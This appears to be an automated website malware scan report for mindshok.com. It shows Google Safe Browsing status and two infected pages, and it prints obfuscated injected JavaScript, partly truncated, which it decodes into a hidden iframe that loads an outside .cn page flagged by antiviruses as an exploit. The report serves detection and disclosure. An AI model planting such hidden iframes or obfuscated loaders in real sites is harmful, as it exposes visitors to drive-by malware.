New scan:

Malware Scanner report for mindshok.com

Malicious/Suspicious/Total urls checked
2/0/2
2 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "mindshok.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=mindshok.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://mindshok.com/
403 Forbidden
Content-Length: 1997
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function c72649779390m487825d57975e(m487825d579f32){ function m487825d57a705(){return 16;} return (parseInt(m487825d579f32,m487825d57a705()));}function m487825d57b6ae(m487825d57be82){ var m487825d57d5fe=2; var m487825d57c655='';m487825d57e5a6=String.fromCharCode;for(m487825d57ce29=0;m487825d57ce29<m487825d57be82.length;m487825d57ce29+=m487825d57d5fe){ m487825d57c655+=(m487825d57e5a6(c72649779390m487825d57975e(m487825d57be82.substr(m487825d57ce29,m487825d57d5fe))));}return m487825d57c655;} var
... 983 bytes are skipped ...
253637'+z5d+'2536382537'+z5d+'342533642533352533362533312532302537'+z5d+'332537'+z5d+'342537'+z5d+'39253663253635253364253237'+z5d+'2536342536392537'+z5d+'332537'+z5d+'302536632536312537'+z5d+'39253361253230253665253666253665253635253237'+z5d+'2533652533632532662536392536362537'+z5d+'3225363125366425363525336527'+z5d+'29293B7'+z5d+'D7'+z5d+'6617'+z5d+'2206D7'+z5d+'969613D7'+z5d+'47'+z5d+'27'+z5d+'5653B3C2F7'+z5d+'3637'+z5d+'2697'+z5d+'07'+z5d+'43E';document.write(m487825d57b6ae(m487825d57ed7a));

Decoded script:


<iframe name=c7 src='http://opana.cn/opa.html?'+Math.round(Math.random()*439263)+'8b' width=783 height=561 style='display: none'></iframe>

Antivirus reports:

Microsoft
Exploit:HTML/IframeRef.CQ
NANO-Antivirus
Trojan.Url.IframeB.vfvwf

http://mindshok.com/test404page.js
404 Not Found
Content-Length: 2068
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function c72649779390m487825df42e45(m487825df43619){ function m487825df43def(){var m487825df445c0=16;return m487825df445c0;} return (parseInt(m487825df43619,m487825df43def()));}function m487825df44d96(m487825df45568){ var m487825df46ce4=2; var m487825df45d3c='';m487825df47c8c=String.fromCharCode;for(m487825df46510=0;m487825df46510<m487825df45568.length;m487825df46510+=m487825df46ce4){ m487825df45d3c+=(m487825df47c8c(c72649779390m487825df42e45(m487825df45568.substr(m487825df46510,m487825df46ce
... 1054 bytes are skipped ...
253637'+z5d+'2536382537'+z5d+'342533642533312533342533392532302537'+z5d+'332537'+z5d+'342537'+z5d+'39253663253635253364253237'+z5d+'2536342536392537'+z5d+'332537'+z5d+'302536632536312537'+z5d+'39253361253230253665253666253665253635253237'+z5d+'2533652533632532662536392536362537'+z5d+'3225363125366425363525336527'+z5d+'29293B7'+z5d+'D7'+z5d+'6617'+z5d+'2206D7'+z5d+'969613D7'+z5d+'47'+z5d+'27'+z5d+'5653B3C2F7'+z5d+'3637'+z5d+'2697'+z5d+'07'+z5d+'43E';document.write(m487825df44d96(m487825df4845f));

Decoded script:


<iframe name=c7 src='http://opana.cn/opa.html?'+Math.round(Math.random()*78672)+'1f4451b9' width=528 height=149 style='display: none'></iframe>

Antivirus reports:

Microsoft
Exploit:HTML/IframeRef.CQ
NANO-Antivirus
Trojan.Url.IframeB.vfvwf


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: mindshok.com

Result:
HTTP/1.1 403 Forbidden
Date: Sun, 11 Jan 2015 05:18:33 GMT
Server: Microsoft-IIS/6.0
Content-Length: 1997
Content-Type: text/html
X-Powered-By: PleskWin
X-Powered-By: ASP.NET

...1997 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mindshok.com
Referer: http://www.google.com/search?q=mindshok.com

Result:
The result is similar to the first query. There are no suspicious redirects found.